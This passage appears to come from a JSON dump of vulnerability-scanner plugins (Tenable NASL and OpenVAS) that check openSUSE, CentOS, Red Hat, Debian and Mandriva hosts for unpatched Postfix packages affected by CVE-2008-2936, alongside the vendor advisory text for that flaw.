The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postfix-133.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40111);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\");\n\n script_name(english:\"openSUSE Security Update : postfix (postfix-133)\");\n script_summary(english:\"Check for the postfix-133 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=409120\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-2.5.1-28.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-devel-2.5.1-28.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-mysql-2.5.1-28.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postfix-postgresql-2.5.1-28.3\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-25T10:56:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880268", "href": "http://plugins.openvas.org/nasl.php?oid=880268", "type": "openvas", "title": "CentOS Update for postfix CESA-2008:0839 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015185.html\");\n script_id(880268);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 i386\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:1361412562310870021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870021", "type": "openvas", "title": "RedHat Update for postfix RHSA-2008:0839-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for postfix RHSA-2008:0839-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00015.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870021\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0839-01\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"RedHat Update for postfix RHSA-2008:0839-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "The remote host is missing an update to postfix\nannounced via advisory DSA 1629-1.", "modified": "2017-07-07T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:61434", "href": "http://plugins.openvas.org/nasl.php?oid=61434", "type": "openvas", "title": "Debian Security Advisory DSA 1629-1 (postfix)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1629_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1629-1 (postfix)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nThe default Debian installation of Postfix is not affected. Only a\nconfiguration meeting the following requirements is vulnerable:\n* The mail delivery style is mailbox, with the Postfix built-in\nlocal(8) or virtual(8) delivery agents.\n* The mail spool directory is user-writeable.\n* The user can create hardlinks pointing to root-owned symlinks\nlocated in other directories.\n\nFor a detailed treating of this issue, please refer to the upstream\nauthor's announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\";\ntag_summary = \"The remote host is missing an update to postfix\nannounced via advisory DSA 1629-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201629-1\";\n\n\nif(description)\n{\n script_id(61434);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 17:00:42 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-2936\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1629-1 (postfix)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.3.8-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880023", "href": "http://plugins.openvas.org/nasl.php?oid=880023", "type": "openvas", "title": "CentOS Update for postfix CESA-2008:0839 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015186.html\");\n script_id(880023);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 x86_64\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880268", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880268", "type": "openvas", "title": "CentOS Update for postfix CESA-2008:0839 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015185.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880268\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:830713", "href": "http://plugins.openvas.org/nasl.php?oid=830713", "type": "openvas", "title": "Mandriva Update for postfix MDVSA-2008:171 (postfix)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for postfix MDVSA-2008:171 (postfix)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer of the SUSE Security Team discovered a flaw in\n the way Postfix dereferenced symbolic links. If a local user had\n write access to a mail spool directory without a root mailbox file,\n it could be possible for them to append arbitrary data to files that\n root had write permissions to (CVE-2008-2936).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"postfix on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-08/msg00014.php\");\n script_id(830713);\n script_version(\"$Revision: 6568 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:04:21 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:171\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"Mandriva Update for postfix MDVSA-2008:171 (postfix)\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = 